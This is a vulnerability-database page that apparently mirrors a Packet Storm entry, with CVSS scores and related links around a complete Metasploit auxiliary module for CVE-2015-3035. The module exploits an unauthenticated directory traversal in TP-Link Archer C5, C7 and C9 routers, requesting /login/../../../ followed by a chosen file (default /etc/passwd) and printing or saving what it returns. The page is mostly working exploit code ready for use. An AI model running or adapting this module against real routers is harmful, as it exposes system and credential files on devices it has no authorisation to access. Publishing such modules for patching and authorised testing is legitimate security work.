Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNick Cottrell, Anna Graterol, Mana Mostaani, metasploit.comPACKETSTORM:180649
HistoryAug 31, 2024 - 12:00 a.m.

Archer C7 Directory Traversal

2024-08-3100:00:00
Nick Cottrell, Anna Graterol, Mana Mostaani, metasploit.com
packetstormsecurity.com
10
metasploit
tp-link
archer
c7
c5
c9
vulnerability
http
file retrieval
bid
cve
2015-3035
directory traversal
security

CVSS2

7.8

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:C/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7

Confidence

Low

JSON
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Deprecated  
moved_from 'auxiliary/scanner/http/archer_c7_traversal'  
  
include Msf::Exploit::Remote::HttpClient  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Archer C7 Directory Traversal Vulnerability',  
'Description' => %q{  
This module exploits a directory traversal vulnerability in the PATH_INFO found at /login/  
on TP-Link Archer C5, C7, and C9 routers of varying versions.  
},  
'References' => [  
[ 'BID', '74050 ' ],  
[ 'CVE', '2015-3035' ]  
],  
'Author' => [ 'Nick Cottrell <ncottrellweb[at]gmail.com>', 'Anna Graterol <annagraterol95[at]gmail.com>', 'Mana Mostaani <mana.mostaani[at]gmail.com>' ],  
'License' => MSF_LICENSE,  
'DisclosureDate' => '2015-04-08',  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => []  
}  
)  
)  
  
register_options(  
[  
Opt::RPORT(80),  
OptString.new('FILE', [true, 'The file to retrieve', '/etc/passwd']),  
OptBool.new('SAVE', [false, 'Save the HTTP body', false]),  
]  
)  
end  
  
def check  
res = send_request_raw({  
'method' => 'GET',  
'uri' => '/'  
})  
return Exploit::CheckCode::Unknown unless res  
  
device_title = res.get_html_document&.at('//title')&.text  
if device_title =~ /Archer C\d/  
return Exploit::CheckCode::Appears("Target device '#{device_title}'")  
end  
  
Exploit::CheckCode::Safe('Target does not appear to be an Archer Cx router.')  
end  
  
def run  
uri = normalize_uri('/login/../../../', datastore['FILE'])  
print_status("Grabbing data at #{uri}")  
res = send_request_raw({  
'method' => 'GET',  
'uri' => uri.to_s  
})  
  
fail_with(Failure::Unreachable, 'Connection failed') unless res  
  
fail_with(Failure::NotFound, 'The file does not appear to exist') if res.body.to_s.include?('Error 404 requested page cannot be found')  
  
# We don't save the body by default, because there's also other junk in it.  
# But we still have a SAVE option just in case  
print_good("#{datastore['FILE']} retrieved")  
print_line(res.body)  
  
if datastore['SAVE']  
p = store_loot(  
'archer_c7.file',  
'application/octet-stream',  
rhost,  
res.body,  
::File.basename(datastore['FILE'])  
)  
print_good("File saved as: #{p}")  
end  
end  
end  
`

Related

prion 1
openvas 2
nessus 1
metasploit 1
nuclei 1
attackerkb 1
cve 1
cisa_kev 1
nvd 1
securityvulns 2
packetstorm 1
cvelist 1
rapid7blog 1
prion
prion
Directory traversal
2015-04-22 01:59:00
openvas
openvas
Multiple TP-LINK Products LFI Vulnerability (Apr 2015) - Active Check
2015-04-10 00:00:00
Generic HTTP Directory Traversal (Web Dirs) - Active Check
2021-07-22 00:00:00
nessus
nessus
TP-Link Directory Traversal (CVE-2015-3035)
2024-05-15 00:00:00
metasploit
metasploit
Archer C7 Directory Traversal Vulnerability
2023-06-05 14:07:11
nuclei
nuclei
TP-LINK - Local File Inclusion
2022-09-18 09:05:59
attackerkb
attackerkb
CVE-2015-3035
2015-04-22 00:00:00
cve
cve
CVE-2015-3035
2015-04-22 01:59:02
cisa_kev
cisa_kev
TP-Link Multiple Archer Devices Directory Traversal Vulnerability
2022-03-25 00:00:00
nvd
nvd
CVE-2015-3035
2015-04-22 01:59:02
securityvulns
securityvulns
TP-LINK devices unauthorized files access
2015-04-19 00:00:00
SEC Consult SA-20150410-0 :: Unauthenticated Local File Disclosure in multiple TP-LINK products &#40;CVE-2015-3035&#41;
2015-04-19 00:00:00
packetstorm
packetstorm
TP-LINK Local File Disclosure
2015-04-10 00:00:00
cvelist
cvelist
CVE-2015-3035
2015-04-17 18:00:00
rapid7blog
rapid7blog
Metasploit Weekly Wrap-Up
2023-06-07 18:09:30

CVSS2

7.8

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:C/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7

Confidence

Low

JSON
Related for PACKETSTORM:180649
prion1openvas2nessus1metasploit1nuclei1attackerkb1cve1cisa_kev1nvd1securityvulns2packetstorm1cvelist1rapid7blog1